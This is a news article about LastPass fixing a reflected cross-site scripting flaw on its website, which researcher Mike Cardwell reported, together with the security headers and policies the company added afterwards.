14 DAY TRIAL // Password management service LastPass has fixed a serious cross-site scripting vulnerability on its website which could have been exploited to obtain sensitive information about other people's accounts.
LastPass allows users to generate secure passwords for each of their accounts and store them inside an encrypted container controlled by a master password.
The company offers extensions for all major browsers, which help with auto-fill and other operations, but the login details can also be accessed via its website.
The flaw on lastpass.com was discovered by a UK independent security researcher named Mike Cardwell who notified the company about it.
"I reported this vulnerability responsibly, and they fixed it within three hours," Cardwell writes. However, he adds that "if you're a LastPass user you should still be very concerned though;
"I believe this is ultimately a problem with their architecture and something which could easily happen again in future."
The vulnerability, which according to LastPass was a reflected cross-site scripting (XSS) one, could have been exploited by loading the vulnerable page in a frame on another website.
If the victim would have browsed that website while logged into LastPass, the attacker could have retrieved their email address, password reminder, list of sites and a history of their logins.
In a post on its official blog, LastPass assures users that the vulnerability was fixed before anyone had the chance to exploit it for malicious purposes.
"The cause of this issue was with our testing procedure for this particular case, which has been rectified," the company says adding that it has also made other security-related changes to its website.
One was to implement the HTTP Strict Transport Security (HSTS) policy which forces compatible browsers like Chrome and Firefox to always use HTTPS when connecting to the site.
It also improved input filtering and added the X-Frame-Options response header which tells browsers that loading content from the site in a frame is not allowed.
Finally, the company is also in the process of adding support for Mozilla's Content Security Policy (CSP) specification which can be used to restrict domains from which content can be loaded into the website.